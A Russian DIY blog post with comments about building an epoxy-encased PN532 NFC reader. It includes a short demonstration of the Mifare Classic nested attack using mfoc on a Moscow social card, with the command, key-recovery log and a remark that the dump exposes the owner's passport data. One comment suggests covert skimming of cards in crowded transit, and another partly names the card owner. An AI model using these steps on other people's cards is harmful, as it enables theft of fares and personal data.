Зарегистрироваться

Самодельный NFC ридер для проверки безопасности бесконтактных карт

  • Цена: $16.35 + $1.29

Я расскажу как изготовить устройство для исследования бесконтактных карт. Вместо корпуса платы будут полностью залиты прозрачной эпоксидной смолой.
Внутри подробное описание процесса изготовления и пример использования ридера для осуществления атаки на социальную карту москвича.



Основная плата ридера это PN532 Breakout Board. Она может работать по SPI, I2C и UART. Плата максимально полно поддерживается библиотекой libnfc. Список поддерживаемых ридеров.

Основное отличие этого ридера от обычных (PC/SC совместимых) в том, что с ним работает специфический извращенский софт, позволяющий выполнять недокументированные действия, которые требуются для исследовательских целей.

Для подключения ридера к компьютеру, в большинстве случаев, требуется еще одно устройство. Я буду использовать протокол UART и адаптер CP2102.

В какой-то момент мне надоели торчащие пины на плате, царапающие ткань рюкзака и болтающийся TTL адаптер, и я решил слепить все это в одно устройство с длинным кабелем.

То, что получилось в итоге:
К сожалению муська не дает вставлять видео в формате webm, хотя это открытый прогрессивный формат легковесного видео. Это видео весит 184КБ i.imgur.com/X7WyPCG.webm На видео показано считывание платежной карты MasterCard с функцией PayPass



Используемые компоненты




Сперва лепим богомола из пасты для моделирования. Паста довольно быстро высыхает на воздухе, поэтому нужно торопиться, иначе она начнет крошиться. На полное застывание требуются сутки. После высыхания изделие легко обрабатывается стеком или зубочисткой. Чем-то напоминает мягкий гипс или мел.



Покраска выполнялась акриловыми красками. Позже выяснилось, что это не самый лучший вариант для заливки эпоксидной смолой, потому что смола слегка растворила акрил.




Выпаиваем все торчащие пины из обоих устройств. В качестве TTL адаптера я использовал Silabs CP2102.



И припаиваем TTL адаптер к плате ридера. Прихватываем адаптер каплей термоклея, чтобы хрупкая пайка не оторвалась в процессе дальнейшей обработки.
Вместо USB штекера на TTL адаптере припаиваем кабель напрямую.
Устанавливаем перемычку на NFC ридере в положение UART.




Самым сложным оказалось изготовление формы для заливки.
Форму я изготовил из картонки и промазал воском. Размер формы несколько больше с учетом того, что лишняя смола уберется шлифовкой.



Отверстие под кабель я замазал воском от свечи.

Заливаем!







Во время заливки на поверхности могут появляться пузыри, их можно удалить прыская на поверхность этиловым спиртом (или изопропиловым?) из пульверизатора.
Чтобы на поверхность не оседала пыль, накрываем миской.




Заявленное время высыхания эпоксидной смолы 24 часа, но, так как в моем случае очень толстый слой, я решил подстраховаться и подождать двое суток.
Вытаскиваем наш слиток.






Видно как потек акрил вокруг богомола, нужно было покрыть его лаком.



Я боялся, что при застывании, смола может порвать контакты на платах, но все заработало.




Шлифуем брусок на ленточной шлифмашине, закрепленной верх ногами на столе








Убираем острые края напильником




Готово.



Зачем это нужно?


Этим ридером можно взаимодействовать с любыми картами стандарта ISO 14443. Сюда относятся проездные для общественного транспорта, платежные карты PayPass/Paywave, любые штуки с приставкой NFC и т. д. В том числе читать и модифицировать данные при достаточной компетенции.
Ридер полностью поддерживается библиотекой libnfc, что позволяет проводить аудит безопасности многих популярных типов карт.

Я не стану описывать способы накручивания денег на абонементах или любые другие незаконные действия. Но для наглядности продемонстрирую давно известную атаку на карты Mifare Classic на примере социальной карты москвича.
Карта совмещает в себе платежную карту visa, выпущенную Банком Москвы, и бесконтактную карту, являющуюся в том числе проездным на общественном транспорте.

Утилита mfoc реализует давно известную уязвимость mifare nested, позволяющую узнать ключи от всех секторов карты, при условии что известен хотя бы один ключ.

Кладем карту на ридер и запускам mfoc.

mfoc сперва попытается авторизоваться в каждом сектор используя стандартные ключи mifare. Как видно из лога, для некоторы секторов был найден ключ А. Теперь по прошествии 10-20 минут, все недостающие ключи будут найдены и дамп карты будет полностью записан в файл /tmp/msk_social.mfd
tangorobot$ mfoc/src/mfoc  -O /tmp/msk_social.mfd
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  02  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 0d  b0  3d  7a  
      SAK (SEL_RES): 18  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 4K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1
* SmartMX with MIFARE 4K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [/............///........................]
[Key: d3f7d3f7d3f7] -> [/............///........................]
[Key: 000000000000] -> [/............///........................]
[Key: b0b1b2b3b4b5] -> [/............///........................]
[Key: 4d3a99c351dd] -> [/............///........................]
[Key: 1a982c7e459a] -> [/............///........................]
[Key: aabbccddeeff] -> [/............///........................]
[Key: 714c5c886e97] -> [/............///........................]
[Key: 587ee5f9350f] -> [/......	......///........................]
[Key: a0478cc39091] -> [/............///........................]
[Key: 533cb6c723f6] -> [/............///........................]
[Key: 8fd0a4f256e9] -> [/............///........................]


В дампе, например, помимо абонимента для общественного транспорта, можно найти паспортные данные владельца карты, номер паспорта и кем выдан в кодировке CP1251.



Такие дела.
+
avatar
+11
Ничего не понял, но богомол зачетный :)
+
avatar
  • Kartus
  • 11 января 2016, 09:26
+6
Богомол, как богомол, а вот гей роботс фактори, это да, зачет автоматом)))
+
avatar
+1
Ну вот, журналюги уже сперли Вашу картинку:
cripo.com.ua/?sect_id=10&aid=206913
+
avatar
  • Nanakon
  • 10 января 2016, 22:42
+9
Отличная разработка, но данные в хексе тоже надо прятать, все легко читается)
+
avatar
+4
Читайте на здоровье, владелица карты одобряет. Так как карта давно не актуальна и сама владелица больше не гражданка России :)
+
avatar
  • Nanakon
  • 10 января 2016, 22:45
+2
А смысл было тогда русский текст замазывать?
+
avatar
  • Sanja
  • 10 января 2016, 22:49
+26
Думаю, автор решил, что тот, кто дорос из hex-кодов восстановить текст — взрослый человек и вредных глупостей с ПД делать не будет
+
avatar
+30
С чем ее и поздравляю!
+
avatar
  • DASEN
  • 10 января 2016, 23:26
+14
Пол страны поздравляют))
+
avatar
  • bowe
  • 12 января 2016, 01:18
+2
дубовый или паркетный?
парадокс, перелогинься
+
avatar
  • DASEN
  • 12 января 2016, 08:39
0
Парадокс в отпуске, косячу за него я. Ксведениюпринял, большеподобноенеповторится)
+
avatar
  • Yulong
  • 11 января 2016, 08:32
+2
Автор просто красавец, я долго ждал подобный обзор! Сам хотел бы с проездными поиграться.
+
avatar
  • Sanja
  • 10 января 2016, 22:43
+1
техника с эпоксидкой — зачётная. Надо будет наведаться в медицинский магазин — поинтересоваться, нет ли чего аналогичного в арсенале у стоматологов. А то покупать 300 мл. на $15 — земноводное не велит

P.S. И отдельное спасибо за надписи на плате, повеселили :)

C какой зернистостью шкурки на шлифмашине такая гладкая поверхность получается?
+
avatar
0
Памятники из искусственного камня льют используя нечто изначально прозрачное, аналогичное эпоксидной смоле, наверняка дешевле чем у стоматологов выйдет.
+
avatar
  • Sanja
  • 10 января 2016, 23:08
+1
Погуглил. Пишут, что нужного результата можно добиться смешиванием отвердителя 921(ОП) и смолы ЭП-СМ-ПРО в соотношении 45-55 м.ч. к 100 м.ч.

4 кило смолы (самая малая тара — одна канистра) — 2800 руб, кило отвердителя — 705 руб. Надо будет попробовать.
+
avatar
+23
Как раз хотел дать ссылку на этих ребят. Они советуют использовать EPOXY 520 или ЭП-СМ-ПРО + отвердитель 921ОП.

Я вдохновился вот эти постом https://top-samodelki.ru/usilitel-dlja-naushnikov-svoimi-rukami/
Чувак сделал очень крутой усилитель для наушников.
Смолу он использует какую–то модную импортную и технология процесса у него намного круче.
+
avatar
  • Sanja
  • 11 января 2016, 00:52
0
деятель по ссылке — крут
+
avatar
  • dsr
  • 11 января 2016, 12:46
+1
Автор, видимо, тут — runawaybrainz.blogspot.ru/
У него там и другие забавные самоделки есть…
+
avatar
+2
спасибо за ссылку, очень интеречный блог
+
avatar
  • AL_Kur
  • 11 января 2016, 01:27
+1
добавить пластификатора — будет усилитель по полу прыгать
+
avatar
0
Как он его чинить собирается, если микросхема выгорит?
+
avatar
0
А как чинят микросхемы современных телефонов?
+
avatar
  • spc
  • 11 января 2016, 12:25
0
Микросхемы не чинят, чинят телефоны. Заменой микросхемы, что в случае на картинке практически невозможно.

Т.е. изделие красивое, слов нет — но абсолютно неремонтопригодное. Несмотря на то, что компоненты внутри можно чуть ли не ломом менять, при условии, что они не как мухи в янтаре.
+
avatar
  • kmserzh
  • 13 января 2016, 01:10
+1
Я такой же сделал, хорошо, залить не успел. Сжег микруху, перепутав полярность, играя с аккумуляторами…
+
avatar
  • ser100
  • 10 января 2016, 22:59
0
У стоматологов всяких материалов навалом.
+
avatar
+4
У стоматологов 146% дороже выйдет. Ибо как минимум оно должно быть чистым с медицинской точки зрения (аллергия и всё такое). У них там вообще своя атмосфера. Знакомый пытался купить немного материала для пломбы (детальку прочную в районе 0.5 кубического см слепить), так его просто погнали, как будто это супер-пупер секретный материал и просто так гражданским не продаётся, только в виде пломб.
+
avatar
+19
Конечно! Пришел тут, детальку ему… а сам пломбы себе бесплатно поставит!
+
avatar
  • Lakec
  • 11 января 2016, 01:06
+2
Могу твоему знакомому помочь), жена — стоматолог.
+
avatar
+1
Спасибо. Но он уже решил эту задачу более простым способом. Да и давно это дело было, года два назад.
+
avatar
+5
C какой зернистостью шкурки на шлифмашине такая гладкая поверхность получается?
На шлифмашинке я снимал излишки 240, потом руками доводил на 1000 под струей воды, но мне все равно не понравился результат. Поверхность была матовой. В итоге доводил круговой шлифманой и фетровым кругом с пастой 3M (зернистость пасты не помню).

Кстати у меня образовалось два пузыря под платой. Я высверлил их гравером, залил эти полости смолой и выровнял шлифовкой.

+
avatar
  • kalebas
  • 11 января 2016, 10:00
0
Во избежание пузырей, наверное, надо делать форму с более высокими бортами и заливать держа ее под наклоном в 45 град к горизонтали, с последующим выравниванием. Ну или попробовать вертикальную форму — ставить плату на ребро
+
avatar
  • Aostspb
  • 11 января 2016, 17:18
0
Чтобы пузырей не было — такие отливки вакуумируют. :)
+
avatar
  • Sento
  • 18 января 2016, 17:49
0
С такими руками, сделать миниатюрный вибростол — дело минут пятнадцати…
+
avatar
  • Davinci
  • 11 января 2016, 00:58
0
есть прозрачный пластик для заливики, я на ютуб канале самоделкина какого-то слышал про него
+
avatar
+1
Ссылку было бы полезней.
+
avatar
  • Davinci
  • 11 января 2016, 01:03
+1
Зачем было накрывать от пыли, если вы все равно потом шкурите?)
+
avatar
+1
Лицевую часть не пришлось шкурить, она была получилось достаточно глянцевой. Пыль может оседать глубоко, длинные ворсинки будут заметны.
+
avatar
  • Aloha_
  • 11 января 2016, 08:35
0
Эпоксидка ЭДП или ЭД20 стоит недорого. Вам хватит.
Сохнет так же 24 часа. Импортную для этих целей покупать смысла нет.
+
avatar
0
Больше отвердителя-быстрее результат)
+
avatar
  • Aloha_
  • 11 января 2016, 09:07
0
А может и вскипеть и застыть за пару минут. Проходили уже.
Кстати, больше отвердителя — выше хрупкость. Для кого инструкции пишут то?
+
avatar
  • Z2K
  • 11 января 2016, 09:08
+2
Если слишком много не затвердеет вообще. Будет твердо липкая, но не затвердеет. Что б было быстрее надо просто повысить температуру, до 60-70гр, но всей конструкции, а не подогревать. Положить в закрытый объем и там плавно поднять температуру, за 2-3 часа будет камень. Только следует учесть, что при нагревании смесь становиться жидкой почти до текучести воды. С одной стороны плюсы — затечет во все закоулки и выемки и пузыри воздуха удаляться, а с другой если где будет неплотность или дырка протечет и вытечет как вода.
А пропорции смолы и отвердителя желательно соблюдать по инструкции (как правило 1:10) посколько именно тогда обеспечивается максимальная твердость клея, эпоксидного материала.
+
avatar
0
Согласен. Говоря больше я не имел ввиду 50:50
+
avatar
  • Z2K
  • 11 января 2016, 09:18
0
Так нельзя. Ничего не получится. Разве что в «отвердителе» вещества — активатора полимеразиционной реакции очень мало. И следует учесть, что абсолютное большинство смол и отвердителей вредные для человека вещества. И использовать для работ с предметами которые имеют контакт с пищевыми продуктами надо ТОЛЬКО СПЕЦИАЛЬНЫМИ ЭПОКСИДНЫМИ наполнителями и клеями. Безопасными для человека.
+
avatar
  • Z2K
  • 11 января 2016, 09:47
+1
Только надевайте перчатки при работе со шлифмашинкой.
+
avatar
+1
<зануда_mode>
а лучше надевайте
</зануда_mode>

а в случае с эпксидкой лучше еще и респиратор…
+
avatar
  • Z2K
  • 11 января 2016, 10:01
0
Респиратора не надо, просто чтоб кожа не контактировала с отвердителем, ну и смолой (если получиться). Отвердители хорошо проникают через кожу. (Ну, это если почти каждый день работать, а если раз в год то ерунда все это.)
+
avatar
+1
Когда мелкой шлифуешь, пыль летит мелкодисперсная. Сама эпоксидка вроде как безвредная, но вот когда она в легких — всё становится плохо. За один раз, конечно, пневмокониоз не заработаешь, но зачем себе вредить когда респиратор-лепесток стоит копейки.
+
avatar
  • Z2K
  • 11 января 2016, 10:09
0
Да, я не понял. Думал при заливке. Так конечно.
+
avatar
  • Z2K
  • 11 января 2016, 10:11
0
В основном вредная даже после отвердевания. Только специальные безвредные — могут контактировать с питьевой водой и продуктами. Но они дороже. И возможно хуже по термостойкости.
+
avatar
  • Imho
  • 11 января 2016, 10:51
0
Это где такие цены (15$ за 300мл) ?? У нас раза в 3 дешевле. www.krovli100.ru/index.php?categoryID=569
+
avatar
  • Sanja
  • 11 января 2016, 13:28
0
это у ТС по ссылке на ebay. Но у него сверхпрозрачная же.
+
avatar
  • Megavit
  • 10 января 2016, 22:45
0
Хороший корпус получился! А еще интересно где почитать про уязвимости?
+
avatar
  • Oswald
  • 10 января 2016, 22:45
0
посетители муски читают и офигевают)))))

а если серьзно, ключем на чтение можно разжиться.
вот ключ на запись и кодировка например транспортного блока так не узнаешь, не думаю эмитенты карт такие дураки что оставляют стандартные блоки про выпуске карт.

а так, штука интересная, можно поковыряться в карточках например горнолыжных курортов
+
avatar
  • Alinaki
  • 10 января 2016, 22:46
+2
Привет с несуществующего, чо)
+
avatar
  • asdfgh
  • 10 января 2016, 22:49
-4
Но для наглядности продемонстрирую давно известную атаку на карты Mifare Classic на примере социальной карты москвича.
[skip по просьбе ТС] Ангелина Николаевна во время «атаки» не пострадала? Она знала об «атаке»?
+
avatar
+10
Даже если человек ошибся и не замылил везде то, что должен был, это не повод давать возможность поисковику индексировать все это дело.

Все имеют право на ошибку — написали бы автору, как я, а не занимались бы тиражированием частной информации — не тактично это с Вашей стороны.
+
avatar
  • mVlad77
  • 11 января 2016, 21:09
0
Украинская фамилия походу (Фо… ко)
+
avatar
  • Oleg78
  • 10 января 2016, 22:49
+8
Надо было таракана в смолу залить живьем, как в янтаре.
+
avatar
  • Oswald
  • 10 января 2016, 22:57
0
поржал)))
+
avatar
0
не надо, мы не варвары
+
avatar
  • Z2K
  • 11 января 2016, 00:17
0
К сожалению не так, скорее наоборот. Для примера прочитайте — geektimes.ru/post/267120/. Мы уже никогда не насладимся вкусом этого неизведенного банана. И таких примеров сотни. Не восхитимся супом из настоящей безпородной деревенской курицы.
+
avatar
+2
а вот насчёт куриц, вы наверное не правы… езжайте куда-нибудь, скажем, в красноярскую глубинку, вот там они и есть — куры, которые вылупились как и их родители и бабки-дедки и прочие родственники, из снесённого яйца, естественным способом. были воспитаны в курятнике и т.д. и т.п…
да, про инкубаторы слышали, но домашний инкубатор это совсем не то, что промышленный…
+
avatar
+2
Так и сделаю, спасибо.
+
avatar
  • Z2K
  • 11 января 2016, 00:11
0
Защитники природы негодуют.
+
avatar
+1
Можно розочку бормашиной высверлить
+
avatar
  • dsr
  • 11 января 2016, 12:52
0
Проживаю в городе-герое Москве. Как только кто-то из соседей начинает ремонт, ко мне приходят тараканы и начинают жить у меня — едят все самые модные тараканьи яды, ползают по смертельно опасному для них WI-FI роутеру, маленькие тараканчики радостно бегают вокруг ловушек «регуляторов размножения» и т.д. Уходят они только когда соседи заканчивают ремонт…
+
avatar
  • mVlad77
  • 11 января 2016, 20:55
0
Боже я тоже их лет 15 не видел. И тут соседи сверху продали квартиру, а новые стали делать ремонт. Так эти мелкие суки стали к нам переселяться через вентиляцию. Все щели запенил (не красиво, зато приток новых бойцов остановился), а решетки внутри проклеил двойной мелкой сеткой от комаров и обильно обмазал средством от тараканов. Месяц борьбы и снова 2 года ни одного живого не видел!
+
avatar
+4
Вы с хабром не попутали?: о)
+
avatar
+29
Там теперь только «Дайджест из мира веб-разработки» и рекламные посты в корпоративных блогах. Давно не интересно туда писать.
+
avatar
0
аналогично забил на хабр, первая бОльшая часть юзеров свалили когда администрация решила клонировать успех в виде непонятных мне новых площадок гигтаймс и пр.
+
avatar
0
Как по мне — так логично разделили. Единственное, что напрягает, так это редакторы TM, желтуха сплошная. Вероятно — это вопрос выживания компании.
+
avatar
+3
у меня вот наоборот… На хабре очень много статей из разряда «применим <название неизвестной мне технологии> для <хренпоймичего>», на ГТ же довольно интересные новости бывают помимо откровенной желтухи, всякие DIY-посты как правило там же. На хабр хожу исключительно в поисках знаний по конкретным технологиям, языкам, фреймворкам.
+
avatar
0
Раньше я читал его каждый день, был подписан на очень много хабов, теперь действительно из нового контента очень мало стоящего, если сравнить «как раньше», до разделения и сейчас, то это небо и земля. Это заметно даже по кол-ву комментов.
+
avatar
  • Z2K
  • 11 января 2016, 09:27
0
Кол комментов упало на порядок. Это объективно и документально. Можно просто обработать данные и вывести статистику. Факт.
+
avatar
0
Это говорит не столько о качестве площадки (а качество по-мне растет — в плане удобства, простоты восприятия текста) сколько о предвзятости населения. Будь я активным автором или комментатором, мне не составило бы труда зайти не на хабр, а на соответствующий «отросток». Народ же по непонятной мне причине зафукал и свалил (хотя куда можно свалить, не представляю — аналогов хабра на русском я не вижу).
И я был очень рад, кстати, что всякую муру про лендинги и маркетинг засунули на мегамозг и оно не мелькает у меня в ленте.

А вообще зря мы тут затеяли обсуждение хабра…
+
avatar
  • Z2K
  • 11 января 2016, 09:43
0
Да, оффтоп. Но количество комментов все же показывает заинтерессованость аудитории ресурса. Но аналогичная ситуация и по просмотрах. Динамика количества просмотров.
+
avatar
+1
Но вопрос о том, куда утекла аудитория все равно остается открытым… Не верю, что люди просто перестали писать хорошие статьи, как на старом хабре.
+
avatar
  • Z2K
  • 11 января 2016, 10:06
0
В том плане, что нет альтернативы? Ждут?
+
avatar
0
не знаю, видимо… Либо расползлись по непрофильным сайтам (тут, к примеру, бывают посты)
+
avatar
  • Kartus
  • 11 января 2016, 11:39
+1
Ждут?
Уже нет. Бессмысленно…
+
avatar
+1
А для чего по вашему корпоративные блоги как не для рекламы? Это в воображаемом мире всё бесплатное и люди работают за идею.
+
avatar
+17
хабр уже давно не торт :(
+
avatar
  • Z2K
  • 11 января 2016, 00:18
0
Многие шаг за шагом перекочевывают сюда.
+
avatar
+1
Это зависит от ваших потребностей. Там до сих пор иногда попадается уникальный контент. Иногда.
+
avatar
0
Вот подумайте, почему администрация удалила мой коммент? Думаете потому, что я сказал фигню?
+
avatar
  • Z2K
  • 11 января 2016, 09:29
0
Да, был комент. Бросьте в личку. Не помню.
+
avatar
0
ИМХО — TTL держит до одного метра. При любых раскладах у Вас 4 провода vcc, gnd, tx, rx — я бы адаптер переместил в конец кабеля в USB-вилку, а то как бельмо он смотрится в этой аккуратной поделке.
+
avatar
0
Наверное, но адаптер встроенный в штекер usb у меня был только на чипе pl2303 который еще хуже чем мой CP2102. Как самостоятельно встроить адаптер в вилку, чтобы он при этом был надежным и выглядил нормально я не представляю. Зато кабель от мотороловской зарядки, очень прочный и толстый, AWG 24 вроде на жилах питания.
+
avatar
0
на али есть интерфейсные шнурки для подключения уоки-токи к компу, у них очень удобный форм-фактор, с одной стороны миниджек, с другой юсб
еще можно встроить адаптер в корпус старой флешки.
+
avatar
  • Kartus
  • 12 января 2016, 07:29
0
+
avatar
+1
из той же эпоксидки можно залить :)
+
avatar
0
Вот КМК идеальный вариант.
aliexpress.com/item/MICRO-USB-transformed-into-DIP-female-seat-B-type-patch-turn-into-DIP-transfer-board-welded/32259762311.html
Есть и дешевле. Просто первый попавшийся дал.
+
avatar
  • kirich
  • 10 января 2016, 22:52
+2
Сделано аккуратно, написано красиво, но смысл поделки от меня ускользает.
Зачем все то?
Нет, я конечно понимаю что делает это устройство, непонятно зачем оно нужно в жизни?
Да и габарит вышел большой.
+
avatar
+55
непонятно зачем оно нужно в жизни
Можно крутить над головой держа за провод, светодиоды мигают, красиво ночью.
+
avatar
0
)))))
+
avatar
  • Z2K
  • 11 января 2016, 00:20
0
Очень смешно. :(
+
avatar
  • kirich
  • 11 января 2016, 00:09
+3
А серьезно?
Практическое применение какое? Ну кроме практики шлифовки эпоксидки :)
+
avatar
+7
Ну вот вы какие в повседневной жизни используете RFID технологии? Если кроме домофона никаких, то и применений соответственно нет. Но сейчас даже паспорта в некоторых странах можно читать этим ридером не говоря уже про лыжные подъемники, абонименты в спортзал, лунапарк, проездные, карты доступа и много чего другого. Осцилограф тоже нафиг не нужен «в быту», если так судить.
+
avatar
  • Oswald
  • 11 января 2016, 01:12
0
чушь не пишите ©
не зная маппинг блоков и не имея ключей на запись что вам даст чтение?
игры в хакеров пройдут со временем.
+
avatar
+2
Расскажите как выглядят ключи на запись в карте mifare?
+
avatar
0
Mifare — это торговая марка, а не тип карт. Почитайте BSI TR-03110, если хотите знать как выглядят «ключи на запись». Вкратце — выглядят они как обычные сертификаты, в которых прописано на что имеет право владелец данного сертификата. С приложений типа паспорта вы сможете считать только общие сведения, считав MRZ и авторизовавшись с помощью BAC/PACE. Дальше ничего не выйдет.
+
avatar
  • kirich
  • 11 января 2016, 01:17
+3
Ну вот вы какие в повседневной жизни используете RFID технологии?
Только брелок для доступа на работу и к электронным замкам.
Вообще я занимаюсь монтажом этих систем, потому мне и любопытно, зачем он нужен.

Но сейчас даже паспорта в некоторых странах можно читать этим ридером не говоря уже про лыжные подъемники, абонименты в спортзал, лунапарк, проездные, карты доступа и много чего другого.
Я это прекрасно понимаю.
Я не понимаю другого, вот собрали прибор, интересный, получили информацию с карты, пусть даже ФИО, номер паспорта, номер страховки, что там еще кодируют.
Да даже сколько лет в браке и какие сигареты курит.
Дальше что с этой информацией делать, чем она полезна?
Я пока так и не понял практической пользы.

Вот у Вас был обзор самодельной паяльной станции, смысл понятен, практическое применение тоже.
А здесь узнали что есть дыра в шифровании данных на карте, закрыть Вы ее не можете, максимум, просто не пользоваться этой системой, например перейти на другую.

Вот мне в этом обзоре понравилась работа с эпоксидкой. Раньше тоже много чего делал, то она была желтая и не такая красивая :(

Осцилограф тоже нафиг не нужен «в быту», если так судить.
Осциллограф помогает мне зарабатывать деньги, так как является одним из важных инструментов при ремонте электроники.
Ну и для просто отладки устройств. которые разрабатываю.

Вы занимаетесь разработкой алгоритмов шифрования и защиты информации?
+
avatar
+7
Ну не судите так строго :)
Зачем точно — пусть автор скажет, а я от себя немного напишу.

Собирал примерно тоже самое, только «на коленке» и без красивостей.

Преследовал несколько целей: во-первых разобраться с зоопарком различных карт и понять что там и как можно хранить, во-вторых разработать penetrate-тесты, чтобы проверять на предприятиях, где установлено такого типа оборудование его на уязвимости, в-третьих покумекав, подобрать и написать систему контроля доступа сотрудников на предприятие (хотели сначала биометрию ставить — дорого).

В результате — написал прошивку, и серверную часть для карточек em-marin и внедрил на предприятие для учета прихода/ухода сотрудников — работает и по сей день.

Пен-тесты купила у меня одна контора по безопасности.

Ну и разобрался в технологиях — тоже профит.

Как то так. Чем плохо? :) Ну и про любопытство не забывайте — начиналось, кстати, тупо из-за него, потом уже созрел план :) Не обязательно что-то делать ради материального — опыт — тоже отличная награда, тем более, если он связан с технологией, которая сейчас на острие моды.
+
avatar
  • kirich
  • 11 января 2016, 03:50
+1
Как то так. Чем плохо? :)
Я и не говорил что это плохо, наоборот, я считаю что это хорошо.
Что то делать самому всегда хорошо, особенно когда это красиво выглядит в итоге, да еще и работает как задумывалось.
Только непонятна была цель, преследуемая данными действиями.
А ответ автора все сразу поставил на свои места, вариантов осталось два.
1. Сам не знаю зачем.
2. Знаю, но никому не скажу.
+
avatar
0
Да ежу понятно зачем.
Сунул в рукав куртки, проехал по общественным местам в час пик(метро, автобусы). Где можно без палева прижиматься впритык.
Вот у тебя куча проездных и прочих карт оплаты.
Видел софт который за секунды снимает полный дамп с карты в автоматическом режиме. Потом сиди дома и разбирайся, что интересного на рыбачил. Банковские карты кстати так же ломаются.
Так что шапочка из фольги вам в помощь, а если точнее фольгированый чехол для карты.
+
avatar
0
Дальше что с этой информацией делать, чем она полезна?
так разве ее нельзя тупо записать в новую карту? я думал на этих картах тупо серийник записан
у меня есть карта от столовки, когда я еще в быдловузе был
ее тупо подносиш к автомату и он показывает сколько там денег и можно закинуть нал, а покупать картой
но это внутреннея система, с банком никак не связана

есть еще проездной
контора пишет, что там только номер и этот номер написан на карте и еще qr код есть и он совпадает с надписью

я чего спрашиваю? думал эти карты тупо клонируются
хочу в одной конторе запилить систему доступа по карточкам для постоянных клиентов
там сдаются помещения до 22 часов и как бы оставлять там человечка выходит накладно, а так можно входную дверь в здание открывать уже через телефон внутри конторы

а входную дверь в помещения сделать с электрозамком, а то бегать открывать уже надоело всем
ну и если электрозамок есть, то надо запилить и ключи

до сего момента я думал, что защита этих карт только в виде брендовой картинки
ведь напечатать на карте в домашних условиях вроде пока еще нельзя, а карту проездную я пока еще водиле показываю
уже 2й год или 3й у меня электронная карта, а в автобусах еще не работают читалки

выходит, что ответ карты если тупо записать, то он ничего не дает? если там какие-то ключи поменять, то карта безопасна будет или ключи сидят в одноразовом пзу и прошиваются только на заводе?
+
avatar
  • SEM
  • 11 января 2016, 16:58
0
хочу в одной конторе запилить систему доступа по карточкам для постоянных клиентов
Есть GSM-контроллеры электрозамков, т.е. вместо карточек открывать замок будет звонок с сотового, номер которого записан на вставленной в замок симке (без поднятия трубки, т.е. бесплатно).
Не надо таскать с собой карточку, потерял/сломалось (сотовый или симка) — клиент сам бежит покупать новый телефон или восстанавливать SIM-карту с сохраненим номера.
Можно открывать замок дистанционно, хоть с другого полушария. Т.е. клиент может послать в офис сотрудника «зайди, забери, а я тебе открою» без необходимости встречи для передачи ключа…
+
avatar
0
не, гсм не нужен, это еще один договор с оператором

есть атс, там есть еще одно реле и его можно наверное сделать на открывание замка

надо что-то на карточках и чтобы их не могли клонировать
+
avatar
  • SEM
  • 12 января 2016, 18:08
0
Не договор, а всего одна симка на любой тариф без абонплаты. В QIW-кошелёк закинуть 50 рублей и настроить автоплатёж 1 рубль в месяц на номер симки — чтобы по счёту была движуха и номер не отключили. Можно вручную раз в 2 месяца этот рубль класть.
Номера клонировать — сейчас симки не клонируются.
Вся фишка — нет заморочек с карточками, ни со стороны арендодателя (не надо их закупать, выдавать, вести учёт, удалять из памяти замка если потеряют, и т.п.), ни со стороны клиентов.
Ридер SIM-карт (заносить открывающие номера) — дешевле 2$.
Не годится если нужны строгости — выдача карточек под роспись, запрет на передачу третьим лицам и т.п.
+
avatar
0
Такой замок можно открыть подменив callerid.
+
avatar
  • SEM
  • 13 января 2016, 17:05
0
Полагаю — это сделать труднее, чем скопировать карточку 125КГц (портативные считыватели-копиры на китайских сайтах чуть дороже 10$).
+
avatar
  • Z2K
  • 11 января 2016, 09:36
0
Ну, некоторые паспорта можно читать «так просто» как и сим-карту. Без правильного запроса не получишь вообще никакакого ответа кроме айди, а запрос индивидуальный динамический.
+
avatar
  • CTAHOK
  • 11 января 2016, 00:17
0
Можно крутить над головой держа за провод, светодиоды мигают, красиво ночью.
Блестящий ответ:)
+
avatar
  • spc
  • 11 января 2016, 10:02
0
Это если бы вы в этот кирпич сделали ввод нормальный. А так — развлечение на пять минут.
+
avatar
  • Z2K
  • 11 января 2016, 00:19
0
Курсак?
+
avatar
  • kirich
  • 11 января 2016, 00:21
0
Самому любопытно.
+
avatar
  • AL_Kur
  • 11 января 2016, 01:57
+1
30 лет назад говорили «курсовик» (тогда же появился «видак»)
+
avatar
  • AndrVU
  • 11 января 2016, 11:00
0
Не, «видик»
+
avatar
0
«видак» тоже использовалось Сектор Газа, Гуляй, мужик! 1992г Трек №3 Видак
+
avatar
  • Almaz69
  • 10 января 2016, 22:54
0
Если правильно понял, для взлома нужно 20 минут. Интересно кто даст свою карту на это время?
+
avatar
  • Oswald
  • 10 января 2016, 22:56
+4
это не «взлом». это просмотр некоторых незашифрованных блоков карты mifare.
+
avatar
0
Это как раз взлом, ибо блоки как раз зашифрованы, но есть уязвимость :D
+
avatar
  • Oswald
  • 10 января 2016, 23:04
0
нет. это чтение блока, используя общедоступный ключ на чтение. там чтение и chip_id можно назвать взломом))))
в блоки пишется инфа, зашифрованная и hex редактором ее не посмотришь. там будет «каша».

ладно, все это было давно и не правда (интересно, сотрудники СБ банков, транспортники и просто ФСБшники) сейчас ip наши переписывают? )))))
+
avatar
0
Ну блок то зашифрован с помощью ключа ;)

это, действительно, было давно :)
+
avatar
  • Oswald
  • 10 января 2016, 23:11
0
транспортники к примеру данные своих блоков тоже шифруют. алгоритмы как правило детские — запись данных задом наперед например.

)))))
p.s. это был не я, это был однорукий человек © the mask
+
avatar
+1
Не пишите ерунды пожалуйста.
+
avatar
  • Oswald
  • 10 января 2016, 23:24
-3
что именно?
+
avatar
+3
это чтение блока, используя общедоступный ключ
То, что некоторые сектора (не содержащие, кстати информации) закрыты стандартным ключом, не означает что остальные сектора можно открыть этим же ключом. Уязвимость эксплуатируемая mfoc позволяет открыть остальные сектора если известен ключ хотябы от одного. У карты описываемой в статье 64 сектора по три блока в каждом. На каждый сектор два 6-и байтных ключа A и B.

алгоритмы как правило детские — запись данных задом наперед например
Это не так.
+
avatar
  • Oswald
  • 11 января 2016, 01:07
0
так, так. по крайней мере было в 8-10х годах.

ладно, не мое дело убеждать кого то)))
+
avatar
  • Z2K
  • 11 января 2016, 00:21
+1
Стоять. Бояться.
+
avatar
  • Almaz69
